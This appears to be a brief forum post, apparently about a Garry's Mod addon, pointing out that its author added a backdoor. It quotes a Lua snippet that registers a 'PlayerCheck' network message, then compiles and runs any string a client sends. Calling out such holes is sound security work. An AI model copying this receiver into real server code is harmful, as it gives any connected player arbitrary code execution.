you added a exploitable net which allow people who use this net to execute code, (like a backdoor)
Code:
util.AddNetworkString( 'PlayerCheck' ) net.Receive( 'PlayerCheck', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )